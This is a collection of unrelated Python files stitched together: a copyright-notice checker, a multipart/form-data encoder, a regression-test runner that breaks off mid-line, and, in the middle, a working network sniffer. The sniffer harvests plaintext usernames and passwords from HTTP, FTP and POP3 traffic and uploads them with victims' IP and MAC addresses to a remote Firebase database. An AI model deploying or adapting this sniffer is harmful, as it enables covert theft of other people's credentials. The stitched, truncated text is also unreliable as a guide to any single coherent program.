(1, 1)), Comment('old style comment', (3, 1)),
Comment('another comment', (4, 1))]))
|
|
#!/usr/bin/env python
# Copyright (c) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks for copyright notices in all the files that need them under the
current directory. Optionally inserts them. When inserting, replaces
an MIT or Khronos free use license with Apache 2.
"""
from __future__ import print_function
import argparse
import fileinput
import fnmatch
import inspect
import os
import re
import sys
# List of designated copyright owners.
AUTHORS = ['The Khronos Group Inc.',
'LunarG Inc.',
'Google Inc.']
CURRENT_YEAR='2016'
YEARS = '(2014-2016|2015-2016|2016)'
COPYRIGHT_RE = re.compile(
    r'Copyright \(c\) {} ({})'.format(YEARS, '|'.join(AUTHORS)))
MIT_BEGIN_RE = re.compile('Permission is hereby granted, '
'free of charge, to any person obtaining a')
MIT_END_RE = re.compile('MATERIALS OR THE USE OR OTHER DEALINGS IN '
'THE MATERIALS.')
APACHE2_BEGIN_RE = re.compile('Licensed under the Apache License, '
                              r'Version 2.0 \(the "License"\);')
APACHE2_END_RE = re.compile('limitations under the License.')
LICENSED = """Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
LICENSED_LEN = 10 # Number of lines in LICENSED
def find(top, filename_glob, skip_glob_list):
"""Returns files in the tree rooted at top matching filename_glob but not
in directories matching skip_glob_list."""
file_list = []
for path, dirs, files in os.walk(top):
for glob in skip_glob_list:
for match in fnmatch.filter(dirs, glob):
dirs.remove(match)
for filename in fnmatch.filter(files, filename_glob):
file_list.append(os.path.join(path, filename))
return file_list
def filtered_descendants(glob):
"""Returns glob-matching filenames under the current directory, but skips
some irrelevant paths."""
return find('.', glob, ['third_party', 'external', 'build*', 'out*'])
def skip(line):
"""Returns true if line is all whitespace or shebang."""
stripped = line.lstrip()
return stripped == '' or stripped.startswith('#!')
def comment(text, prefix):
"""Returns commented-out text.
Each line of text will be prefixed by prefix and a space character. Any
trailing whitespace will be trimmed.
"""
accum = ['{} {}'.format(prefix, line).rstrip() for line in text.split('\n')]
return '\n'.join(accum)
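## For example (illustrative only, not executed):
##   comment('line one\nline two  ', '#')  ->  '# line one\n# line two'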
def insert_copyright(author, glob, comment_prefix):
"""Finds all glob-matching files under the current directory and inserts the
copyright message, and license notice. An MIT license or Khronos free
use license (modified MIT) is replaced with an Apache 2 license.
The copyright message goes into the first non-whitespace, non-shebang line
in a file. The license notice follows it. Both are prefixed on each line
by comment_prefix and a space.
"""
copyright = comment('Copyright (c) {} {}'.format(CURRENT_YEAR, author),
comment_prefix) + '\n\n'
licensed = comment(LICENSED, comment_prefix) + '\n\n'
for file in filtered_descendants(glob):
# Parsing states are:
# 0 Initial: Have not seen a copyright declaration.
# 1 Seen a copyright line and no other interesting lines
# 2 In the middle of an MIT or Khronos free use license
# 9 Exited any of the above
state = 0
update_file = False
for line in fileinput.input(file, inplace=1):
emit = True
            if state == 0:
if COPYRIGHT_RE.search(line):
state = 1
elif skip(line):
pass
else:
# Didn't see a copyright. Inject copyright and license.
sys.stdout.write(copyright)
sys.stdout.write(licensed)
# Assume there isn't a previous license notice.
state = 1
            elif state == 1:
if MIT_BEGIN_RE.search(line):
state = 2
emit = False
elif APACHE2_BEGIN_RE.search(line):
# Assume an Apache license is preceded by a copyright
# notice. So just emit it like the rest of the file.
state = 9
            elif state == 2:
# Replace the MIT license with Apache 2
emit = False
if MIT_END_RE.search(line):
state = 9
sys.stdout.write(licensed)
if emit:
sys.stdout.write(line)
def alert_if_no_copyright(glob, comment_prefix):
"""Prints names of all files missing either a copyright or Apache 2 license.
Finds all glob-matching files under the current directory and checks if they
contain the copyright message and license notice. Prints the names of all the
files that don't meet both criteria.
Returns the total number of file names printed.
"""
printed_count = 0
for file in filtered_descendants(glob):
has_copyright = False
has_apache2 = False
line_num = 0
apache_expected_end = 0
with open(file) as contents:
for line in contents:
line_num += 1
if COPYRIGHT_RE.search(line):
has_copyright = True
if APACHE2_BEGIN_RE.search(line):
apache_expected_end = line_num + LICENSED_LEN
                if (line_num == apache_expected_end) and APACHE2_END_RE.search(line):
has_apache2 = True
if not (has_copyright and has_apache2):
message = file
if not has_copyright:
message += ' has no copyright'
if not has_apache2:
message += ' has no Apache 2 license notice'
print(message)
printed_count += 1
return printed_count
class ArgParser(argparse.ArgumentParser):
def __init__(self):
super(ArgParser, self).__init__(
description=inspect.getdoc(sys.modules[__name__]))
self.add_argument('--update', dest='author', action='store',
help='For files missing a copyright notice, insert '
'one for the given author, and add a license '
'notice. The author must be in the AUTHORS '
'list in the script.')
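## Illustrative invocations (not executed here):
##   python check_copyright.py                         # report files missing notices
##   python check_copyright.py --update 'Google Inc.'  # insert notices for that author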
def main():
glob_comment_pairs = [('*.h', '//'), ('*.hpp', '//'), ('*.sh', '#'),
('*.py', '#'), ('*.cpp', '//'),
('CMakeLists.txt', '#')]
argparser = ArgParser()
args = argparser.parse_args()
if args.author:
if args.author not in AUTHORS:
print('error: --update argument must be in the AUTHORS list in '
'check_copyright.py: {}'.format(AUTHORS))
sys.exit(1)
for pair in glob_comment_pairs:
insert_copyright(args.author, *pair)
sys.exit(0)
else:
count = sum([alert_if_no_copyright(*p) for p in glob_comment_pairs])
sys.exit(count > 0)
if __name__ == '__main__':
main()
|
|
import dpkt
import pcap
import re
import socket
import urlparse
import binascii
import signal
import sys
from firebase import firebase
from pprint import pprint
import settings
from utils import add_colons_to_mac
APP = {80: 'HTTP', 23: 'TELNET', 21: 'FTP', 110: 'POP3'}
class Sniffer(object):
def __init__(self, *args, **kwargs):
self._firebase = firebase.FirebaseApplication(settings.FIREBASE_URL,
None)
# Status update
self._firebase.patch('/status', {"status": "ON"})
pattern = 'tcp and dst port 80 or dst port 21'
# pattern = 'tcp and dst port 80 or dst port 21 or dst port 110'
self.pc = pcap.pcap(kwargs['interface'])
self.pc.setfilter(pattern)
self.all_user_info = {}
self.devices_mac = {}
self.info_counter = 0
def _is_host(self, content):
regex = re.compile('Host: (.*)')
return content is not None and regex.search(content)
def _is_pwd(self, content):
        regex = re.compile('(.*)password=(.*)')  # match the literal field name (brackets made it a character class)
return content is not None and regex.search(content)
def _is_pwd_with_txt(self, content):
        regex = re.compile('(.*)txtPwd=(.*)')  # match the literal field name (brackets made it a character class)
return content is not None and regex.search(content)
def _pick_ftp_info(self, data, client, server, dport, eth_src):
self.devices_mac.setdefault(add_colons_to_mac(eth_src), {})
self.devices_mac[add_colons_to_mac(eth_src)]['client'] = client
self.devices_mac[add_colons_to_mac(eth_src)]['server'] = server
self.devices_mac[add_colons_to_mac(eth_src)]['app'] = APP.get(dport)
self.devices_mac[add_colons_to_mac(eth_src)]['mac'] = (
add_colons_to_mac(eth_src))
if data.get('USER'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'login': data.get('USER')})
if data.get('PASS'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'password': data.get('PASS')})
device_info = self.devices_mac[add_colons_to_mac(eth_src)]
        if 'login' in device_info and 'password' in device_info:
            print "FTP: new password captured:"
pprint(self.devices_mac[add_colons_to_mac(eth_src)])
self._firebase.post('/pwd_table',
self.devices_mac[add_colons_to_mac(eth_src)])
# When push to firebase delete it
del self.devices_mac[add_colons_to_mac(eth_src)]
def _pick_http_info(self, data, client, server, dport, eth_src):
self.info_counter += 1
self.all_user_info[self.info_counter] = (
{'client': client, 'server': server,
'app': APP.get(dport),
'mac': add_colons_to_mac(binascii.hexlify(eth_src))}
)
if data.get('account'):
self.all_user_info[self.info_counter].update(
{'login': data.get('account')[0]})
elif data.get('username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('username')[0]})
elif data.get('identification'):
self.all_user_info[self.info_counter].update({
'login': data.get('identification')[0]})
elif data.get('id'):
self.all_user_info[self.info_counter].update(
{'login': data.get('id')[0]})
elif data.get('os_username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('os_username')[0]})
elif data.get('txtAccount'):
self.all_user_info[self.info_counter].update(
{'login': data.get('txtAccount')[0]})
elif data.get('email'):
self.all_user_info[self.info_counter].update(
{'login': data.get('email')[0]})
else:
self.all_user_info[self.info_counter].update({'login': None})
if data.get('password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('password')[0]})
elif data.get('os_password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('os_password')[0]})
elif data.get('txtPwd'):
self.all_user_info[self.info_counter].update(
{'password': data.get('txtPwd')[0]})
else:
self.all_user_info[self.info_counter].update({'password': None})
        print "HTTP: new password captured:"
pprint(self.all_user_info[self.info_counter])
self._firebase.post('/pwd_table', self.all_user_info[self.info_counter])
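    ## Illustrative note (not executed): urlparse.parse_qs maps each field to a
    ## list of values, e.g. urlparse.parse_qs('username=alice&password=secret')
    ## == {'username': ['alice'], 'password': ['secret']}, which is why the
    ## lookups above take the first element with [0].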
def _get_ftp_pop_payload(self, eth_pkt, ip_pkt, tcp_pkt):
if 'USER' in tcp_pkt.data:
regex = re.compile('USER (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'PASS' in tcp_pkt.data:
regex = re.compile('PASS (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'user' in tcp_pkt.data:
regex = re.compile('user (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'pass' in tcp_pkt.data:
regex = re.compile('pass (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
else:
return
def _get_http_payload(self, eth_pkt, ip_pkt, tcp_pkt):
try:
http_req = dpkt.http.Request(tcp_pkt.data)
if http_req.method == 'POST':
# This is POST method
pass
except dpkt.dpkt.UnpackError:
pass
if 'POST' in tcp_pkt.data:
# print 'POST', tcp.data
if 'password=' in tcp_pkt.data:
# print 'In POST packet password', tcp.data
pwd_obj = self._is_pwd(tcp_pkt.data)
if pwd_obj:
# print 'query string found:', pwd_obj.group(0)
qs_d = urlparse.parse_qs(pwd_obj.group(0))
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'password=' in tcp_pkt.data:
# print 'password', tcp.data
qs_d = urlparse.parse_qs(tcp_pkt.data)
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'txtPwd=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'email=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
else:
return
# Moocs dst IP 140.114.60.144
# Kits dst IP 74.125.204.121
# iLMS dst IP 140.114.69.137
def loop(self):
while True:
result = self._firebase.get('/status', None)
if result.get('status') == 'ON':
try:
for ts, buf in self.pc:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
if len(tcp.data) > 0:
# print 'Packet in dst port number', tcp.dport
# make sure the pattern is correct
if tcp.dport == 80:
self._get_http_payload(eth, ip, tcp)
elif tcp.dport == 21 or tcp.dport == 110:
self._get_ftp_pop_payload(eth, ip, tcp)
else:
pass
except KeyboardInterrupt:
nrecv, ndrop, nifdrop = self.pc.stats()
print '\n%d packets received by filter' % nrecv
print '%d packets dropped by kernel' % ndrop
break
except (NameError, TypeError):
# print "No packet"
continue
else:
signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
                print "Sniffer paused: status is OFF."
continue
def __del__(self):
# Status update
self._firebase.patch('/status', {"status": "OFF"})
if __name__ == "__main__":
s = Sniffer(interface='eth2')
print '%s is listening on' % s.pc.name
s.loop()
|
|
"""multipart/form-data encoding module
This module provides functions that facilitate encoding name/value pairs
as multipart/form-data suitable for an HTTP POST or PUT request.
multipart/form-data is the standard way to upload files over HTTP"""
__all__ = ['gen_boundary', 'encode_and_quote', 'MultipartParam',
'encode_string', 'encode_file_header', 'get_body_size', 'get_headers',
'multipart_encode']
try:
import uuid
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
return uuid.uuid4().hex
except ImportError:
import random, sha
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
bits = random.getrandbits(160)
return sha.new(str(bits)).hexdigest()
import urllib, re, os, mimetypes
def encode_and_quote(data):
"""If ``data`` is unicode, return urllib.quote_plus(data.encode("utf-8"))
otherwise return urllib.quote_plus(data)"""
if data is None:
return None
if isinstance(data, unicode):
data = data.encode("utf-8")
return urllib.quote_plus(data)
def _strify(s):
"""If s is a unicode string, encode it to UTF-8 and return the results,
otherwise return str(s), or None if s is None"""
if s is None:
return None
if isinstance(s, unicode):
return s.encode("utf-8")
return str(s)
class MultipartParam(object):
"""Represents a single parameter in a multipart/form-data request
``name`` is the name of this parameter.
If ``value`` is set, it must be a string or unicode object to use as the
data for this parameter.
    If ``filename`` is set, it is reported as the filename for this parameter.
    Note that it does not have to be the name of any actual local file.
If ``filetype`` is set, it is used as the Content-Type for this parameter.
    If unset it defaults to "text/plain; charset=utf-8"
If ``filesize`` is set, it specifies the length of the file ``fileobj``
If ``fileobj`` is set, it must be a file-like object that supports
.read().
    At most one of ``value`` and ``fileobj`` may be set; setting both
    will raise a ValueError.
If ``fileobj`` is set, and ``filesize`` is not specified, then
the file's size will be determined first by stat'ing ``fileobj``'s
file descriptor, and if that fails, by seeking to the end of the file,
recording the current position as the size, and then by seeking back to the
beginning of the file.
``cb`` is a callable which will be called from iter_encode with (self,
current, total), representing the current parameter, current amount
transferred, and the total size.
"""
def __init__(self, name, value=None, filename=None, filetype=None,
filesize=None, fileobj=None, cb=None):
self.name = encode_and_quote(name)
self.value = _strify(value)
if filename is None:
self.filename = None
else:
if isinstance(filename, unicode):
# Encode with XML entities
self.filename = filename.encode("ascii", "xmlcharrefreplace")
else:
self.filename = str(filename)
self.filename = self.filename.encode("string_escape").\
replace('"', '\\"')
self.filetype = _strify(filetype)
self.filesize = filesize
self.fileobj = fileobj
self.cb = cb
if self.value is not None and self.fileobj is not None:
raise ValueError("Only one of value or fileobj may be specified")
if fileobj is not None and filesize is None:
# Try and determine the file size
try:
self.filesize = os.fstat(fileobj.fileno()).st_size
except (OSError, AttributeError):
try:
fileobj.seek(0, 2)
self.filesize = fileobj.tell()
fileobj.seek(0)
                except Exception:
raise ValueError("Could not determine filesize")
def __cmp__(self, other):
attrs = ['name', 'value', 'filename', 'filetype', 'filesize', 'fileobj']
myattrs = [getattr(self, a) for a in attrs]
oattrs = [getattr(other, a) for a in attrs]
return cmp(myattrs, oattrs)
def reset(self):
if self.fileobj is not None:
self.fileobj.seek(0)
elif self.value is None:
raise ValueError("Don't know how to reset this parameter")
@classmethod
def from_file(cls, paramname, filename):
"""Returns a new MultipartParam object constructed from the local
file at ``filename``.
``filesize`` is determined by os.path.getsize(``filename``)
``filetype`` is determined by mimetypes.guess_type(``filename``)[0]
``filename`` is set to os.path.basename(``filename``)
"""
return cls(paramname, filename=os.path.basename(filename),
filetype=mimetypes.guess_type(filename)[0],
filesize=os.path.getsize(filename),
fileobj=open(filename, "rb"))
@classmethod
def from_params(cls, params):
"""Returns a list of MultipartParam objects from a sequence of
name, value pairs, MultipartParam instances,
or from a mapping of names to values
The values may be strings or file objects, or MultipartParam objects.
MultipartParam object names must match the given names in the
name,value pairs or mapping, if applicable."""
if hasattr(params, 'items'):
params = params.items()
retval = []
for item in params:
if isinstance(item, cls):
retval.append(item)
continue
name, value = item
if isinstance(value, cls):
assert value.name == name
retval.append(value)
continue
if hasattr(value, 'read'):
# Looks like a file object
filename = getattr(value, 'name', None)
if filename is not None:
filetype = mimetypes.guess_type(filename)[0]
else:
filetype = None
retval.append(cls(name=name, filename=filename,
filetype=filetype, fileobj=value))
else:
retval.append(cls(name, value))
return retval
def encode_hdr(self, boundary):
"""Returns the header of the encoding of this parameter"""
boundary = encode_and_quote(boundary)
headers = ["--%s" % boundary]
if self.filename:
disposition = 'form-data; name="%s"; filename="%s"' % (self.name,
self.filename)
else:
disposition = 'form-data; name="%s"' % self.name
headers.append("Content-Disposition: %s" % disposition)
if self.filetype:
filetype = self.filetype
else:
filetype = "text/plain; charset=utf-8"
#headers.append("Content-Type: %s" % filetype)
#if self.filesize is not None:
# headers.append("Content-Length: %i" % self.filesize)
#else:
# headers.append("Content-Length: %i" % len(self.value))
headers.append("")
headers.append("")
#print "=============="
#print "form headers"
#print "\r\n".join(headers)
#print "=============="
return "\r\n".join(headers)
def encode(self, boundary):
"""Returns the string encoding of this parameter"""
if self.value is None:
value = self.fileobj.read()
else:
value = self.value
if re.search("^--%s$" % re.escape(boundary), value, re.M):
raise ValueError("boundary found in encoded string")
return "%s%s\r\n" % (self.encode_hdr(boundary), value)
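    ## Illustrative layout of a single encoded parameter as produced by
    ## encode_hdr() + encode() above (note that the Content-Type header is
    ## currently commented out in encode_hdr):
    ##   --<boundary>\r\n
    ##   Content-Disposition: form-data; name="<name>"\r\n
    ##   \r\n
    ##   <value>\r\n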
def iter_encode(self, boundary, blocksize=4096):
"""Yields the encoding of this parameter
If self.fileobj is set, then blocks of ``blocksize`` bytes are read and
yielded."""
total = self.get_size(boundary)
current = 0
if self.value is not None:
block = self.encode(boundary)
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
else:
block = self.encode_hdr(boundary)
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
last_block = ""
encoded_boundary = "--%s" % encode_and_quote(boundary)
boundary_exp = re.compile("^%s$" % re.escape(encoded_boundary),
re.M)
while True:
block = self.fileobj.read(blocksize)
if not block:
current += 2
yield "\r\n"
if self.cb:
self.cb(self, current, total)
break
last_block += block
if boundary_exp.search(last_block):
raise ValueError("boundary found in file data")
last_block = last_block[-len(encoded_boundary)-2:]
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
def get_size(self, boundary):
"""Returns the size in bytes that this param will be when encoded
with the given boundary."""
if self.filesize is not None:
valuesize = self.filesize
else:
valuesize = len(self.value)
        return len(self.encode_hdr(boundary)) + 2 + valuesize  # +2 for the trailing "\r\n"
def encode_string(boundary, name, value):
"""Returns ``name`` and ``value`` encoded as a multipart/form-data
variable. ``boundary`` is the boundary string used throughout
a single request to separate variables."""
return MultipartParam(name, value).encode(boundary)
def encode_file_header(boundary, paramname, filesize, filename=None,
filetype=None):
"""Returns the leading data for a multipart/form-data field that contains
file data.
``boundary`` is the boundary string used throughout a single request to
separate variables.
``paramname`` is the name of the variable in this request.
``filesize`` is the size of the file data.
``filename`` if specified is the filename to give to this field. This
field is only useful to the server for determining the original filename.
``filetype`` if specified is the MIME type of this file.
The actual file data should be sent after this header has been sent.
"""
return MultipartParam(paramname, filesize=filesize, filename=filename,
filetype=filetype).encode_hdr(boundary)
def get_body_size(params, boundary):
"""Returns the number of bytes that the multipart/form-data encoding
of ``params`` will be."""
size = sum(p.get_size(boundary) for p in MultipartParam.from_params(params))
    return size + len(boundary) + 6  # closing "--<boundary>--\r\n" delimiter
def get_headers(params, boundary):
"""Returns a dictionary with Content-Type and Content-Length headers
for the multipart/form-data encoding of ``params``."""
headers = {}
boundary = urllib.quote_plus(boundary)
headers['Content-Type'] = "multipart/form-data; boundary=%s" % boundary
headers['Content-Length'] = str(get_body_size(params, boundary))
#headers['Content-Length'] = '-1'
return headers
class multipart_yielder:
def __init__(self, params, boundary, cb):
self.params = params
self.boundary = boundary
self.cb = cb
self.i = 0
self.p = None
self.param_iter = None
self.current = 0
self.total = get_body_size(params, boundary)
def __iter__(self):
return self
    def next(self):
        """Returns the next block of the multipart/form-data
        representation of the parameters."""
if self.param_iter is not None:
try:
block = self.param_iter.next()
self.current += len(block)
if self.cb:
self.cb(self.p, self.current, self.total)
return block
except StopIteration:
self.p = None
self.param_iter = None
if self.i is None:
raise StopIteration
elif self.i >= len(self.params):
self.param_iter = None
self.p = None
self.i = None
block = "--%s--\r\n" % self.boundary
self.current += len(block)
if self.cb:
self.cb(self.p, self.current, self.total)
return block
self.p = self.params[self.i]
self.param_iter = self.p.iter_encode(self.boundary)
self.i += 1
return self.next()
def reset(self):
self.i = 0
self.current = 0
for param in self.params:
param.reset()
def multipart_encode(params, boundary=None, cb=None):
"""Encode ``params`` as multipart/form-data.
``params`` should be a sequence of (name, value) pairs or MultipartParam
objects, or a mapping of names to values.
Values are either strings parameter values, or file-like objects to use as
the parameter value. The file-like objects must support .read() and either
.fileno() or both .seek() and .tell().
    If ``boundary`` is set, then it is used as the MIME boundary. Otherwise
a randomly generated boundary will be used. In either case, if the
boundary string appears in the parameter values a ValueError will be
raised.
If ``cb`` is set, it should be a callback which will get called as blocks
of data are encoded. It will be called with (param, current, total),
indicating the current parameter being encoded, the current amount encoded,
and the total amount to encode.
Returns a tuple of `datagen`, `headers`, where `datagen` is a
generator that will yield blocks of data that make up the encoded
    parameters, and `headers` is a dictionary with the associated
Content-Type and Content-Length headers.
Examples:
>>> datagen, headers = multipart_encode( [("key", "value1"), ("key", "value2")] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> p = MultipartParam("key", "value2")
>>> datagen, headers = multipart_encode( [("key", "value1"), p] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> datagen, headers = multipart_encode( {"key": "value1"} )
>>> s = "".join(datagen)
>>> assert "value2" not in s and "value1" in s
"""
if boundary is None:
boundary = gen_boundary()
else:
boundary = urllib.quote_plus(boundary)
headers = get_headers(params, boundary)
params = MultipartParam.from_params(params)
return multipart_yielder(params, boundary, cb), headers
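## A minimal usage sketch (not part of the original module, never called here):
## streaming a file upload with the helpers above. The file path and field
## names are hypothetical; in practice `datagen` would be handed to an HTTP
## library that accepts an iterable request body.
def _example_streaming_upload():
    params = [MultipartParam.from_file("attachment", "/tmp/example.txt"),
              ("note", "uploaded via the example sketch")]
    datagen, headers = multipart_encode(params)
    # `headers` carries Content-Type (with the boundary) and Content-Length;
    # iterating `datagen` yields the encoded body, reading the file in
    # 4096-byte blocks via MultipartParam.iter_encode().
    body = "".join(datagen)
    return headers, body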
|
|
#!/usr/bin/env python3
"""
Without argument: run all the regression tests.
About the tests:
* They are stored as Python files in the subdirectories.
* The first line must be an explanation of the test.
* Errors(must be True) defines an Error that must be corrected.
* Warning(must be True) defines something that should be corrected;
  once corrected, it must be redefined as an Error.
"""
import os, sys, inspect, re, tempfile, subprocess, json
import wsgiref, wsgiref.simple_server
typedpython_folder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "../pythonjs")))
if typedpython_folder not in sys.path:
sys.path.insert(0, typedpython_folder)
import typedpython
if 'NODE_PATH' not in os.environ:
os.environ['NODE_PATH'] = '/usr/local/lib/node_modules/'
tmpname = os.path.join(tempfile.gettempdir(), "xxx_regtest")
print("Temporary files are stored into '%s...'" % tmpname)
print()
show_details = len(sys.argv) > 1
# List of valid filenames in the parameters
argv = [os.path.abspath(name)
for name in sys.argv[1:]
if os.path.exists(name)
]
__sandbox = {
'mycollection' : range(10)
}
__clients = {} ## keeps track of iterator indices
def httpd_reply( env, start_response ):
path = env['PATH_INFO']
host = env['HTTP_HOST']
client = env['REMOTE_ADDR']
arg = env['QUERY_STRING']
if client not in __clients:
__clients[ client ] = {}
length = 0
if 'CONTENT_LENGTH' in env: length = int(env['CONTENT_LENGTH'])
data = env['wsgi.input'].read( length ).decode('utf-8')
#print('http_reply ->', path, host, client, arg, data)
msg = json.loads( data )
res = ''
if 'call' in msg:
assert 'args' in msg
if msg['call'] == 'concat':
res = ''.join( msg['args'] )
elif msg['call'] == 'add':
res = msg['args'][0] + msg['args'][1]
else:
raise NotImplementedError( msg )
elif 'iter' in msg:
name = msg['iter']
assert name in __sandbox
if name not in __clients[ client ]:
__clients[ client ][name] = 0
index = __clients[ client ][name]
iterable = __sandbox[name]
if index == len(iterable):
index = 0
res = '__STOP_ITERATION__'
else:
res = iterable[ index ]
index += 1
__clients[ client ][name] = index
elif 'set' in msg:
__sandbox[ msg['set'] ] = msg['value']
elif 'get' in msg:
res = __sandbox[ msg['get'] ]
else:
raise NotImplementedError( msg )
start_response( '200 OK', [] )
return [ json.dumps(res).encode('utf-8') ]
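## Illustrative only (never called by this runner): a minimal client sketch for
## the JSON protocol served by httpd_reply above, assuming the server created
## below is listening on localhost:8080. The request path is arbitrary; the
## handler only inspects the JSON body.
def _example_rpc_call():
    import urllib.request
    payload = json.dumps({'call': 'concat', 'args': ['a', 'b', 'c']}).encode('utf-8')
    req = urllib.request.Request('http://localhost:8080/', data=payload)
    with urllib.request.urlopen(req) as reply:
        # the handler answers with a JSON-encoded result, here 'abc'
        return json.loads(reply.read().decode('utf-8'))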
httpd = wsgiref.simple_server.make_server( 'localhost', 8080, httpd_reply )
import threading
thread_id = threading._start_new_thread( httpd.serve_forever, ())
def runnable(command):
    """Returns True if `command` can be run successfully (used to probe for tools)."""
    ## note: the previous implementation checked whether the command printed
    ## anything on stdout, which fails with lua5.1 for "lua -v".
try:
with open(os.devnull, "w") as f:
subprocess.check_call( command.split(), stdout=f, stderr=f )
print("Success: " + command)
return True
    except (OSError, subprocess.CalledProcessError):
print("Failure: " + command)
return False
def run_pypy_test_on(filename):
"""PyPy"""
write("%s.py" % tmpname, patch_python(filename, python='PYPY'))
return run_command("%s %s.py %s" % (pypy_exe, tmpname, display_errors))
def run_old_pypy_test_on(filename):
"""PyPy 1.9"""
write("%s.py" % tmpname, patch_python(filename, python='PYPY'))
return run_command("%s %s.py %s" % (old_pypy_exe, tmpname, display_errors))
old_pypy_runnable = pypy_runnable = False
old_pypy_exe = pypy_exe = None
if os.path.isfile( os.path.expanduser('~/pypy-2.5.0-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.5.0-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.5.0'
elif os.path.isfile( os.path.expanduser('~/pypy-2.3.1-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.3.1-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.3.1'
elif os.path.isfile( os.path.expanduser('~/pypy-2.2-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.2-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.2'
elif runnable( 'pypy --help' ):
pypy_runnable = True
pypy_exe = 'pypy'
if os.path.isfile( os.path.expanduser('~/pypy-1.9/bin/pypy') ) and '--old-pypy' in sys.argv:
old_pypy_runnable = True
old_pypy_exe = os.path.expanduser('~/pypy-1.9/bin/pypy')
webclgl = []
if os.path.isdir( os.path.expanduser('~/webclgl') ):
#webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGL_2.0.Min.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLUtils.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLBuffer.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLKernel.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGL.class.js'), 'rb').read().decode('utf-8') )
## rhino is not run by default because it simply freezes up on maximum callstack errors
rhino_runnable = '--rhino' in sys.argv and runnable("rhino -e 'quit()'")
node_runnable = runnable("node --help")
#shedskin_runnable = runnable("shedskin --help")
## sudo npm install nodewebkit -g
## nodewebkit npm package is broken? https://github.com/shama/nodewebkit/issues/31
#nodewebkit = '/usr/local/lib/node_modules/nodewebkit/bin/nodewebkit'
## download https://github.com/rogerwang/node-webkit/releases/tag/nw-v0.9.2
## and extract to your home directory.
nodewebkit_runnable = False
nodewebkit = os.path.expanduser('~/node-webkit-v0.10.0-rc1-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
nodewebkit = os.path.expanduser('~/node-webkit-v0.9.2-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
